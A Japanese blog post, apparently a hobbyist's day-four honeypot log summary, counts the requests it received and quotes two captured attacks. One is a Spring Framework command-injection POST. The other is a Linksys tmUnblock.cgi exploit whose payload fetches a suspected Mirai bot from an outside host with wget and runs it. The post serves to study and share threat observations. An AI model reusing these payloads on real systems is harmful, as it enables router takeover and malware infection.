honey potの簡易解析4日目

2019-04-04のアクセス数は57件でした。

■送信元IPアドレスの数は 46件です。

■メソッドの種別は以下です。

GET・・51件
PUT・・0件
POST・・4件
HEAD・・2件
CONNECT・・0件
PROFFIND・・0件
その他・・0件

気になるlog

5件目。OSコマンドインジェクション!

[2019-04-04 01:11:03+0900] 58.82.155.174 ほげ:8080 "POST /users?page=&size=5 HTTP/1.1" 200 False 
POST /users?page=&size=5 HTTP/1.1
Host: ほげ:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Content-Length: 119
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/su")]=&password=&repeatedPassword=

spring Frameworkというワークフレームを狙う脆弱性攻撃のようです。お恥ずかしながら、spring Frameworkの存在を初めて知りました。以下の記事が参考になりました。

44件目。Linksys ルータの脆弱性を狙った攻撃。ファイルをダウンロードさせて実行

2019-04-04 15:31:25+0900] 219.78.127.248 192.168.0.14:80 "POST /tmUnblock.cgi HTTP/1.1" 200 False 
POST /tmUnblock.cgi HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded

ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mpsl.bot%3B+wget+http%3A%2F%2Flove.thotiana.live%2Fbins%2Fmpsl.bot%3B+chmod+777+mpsl.bot%3B+.%2Fmpsl.bot+s1%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

mpsl.botはmiraiっぽい。ELFファイルだ!今度、解析してみよう!

9a7a7b0d9fea9fe172d099e12591350396bb690fac08f20d97c828cf7f6f2dfa

VTの結果

sandboxの結果

今後の方向性

とりあえず、一日単位のIPアドレスを載せても役立たないので、まとめて上げる事にします。

毎日新しい発見があり、新鮮ですが、他のハニーポッターと差別化した記事にしたいなぁ。

あと、log転送のメールスクリプトも手加えないと。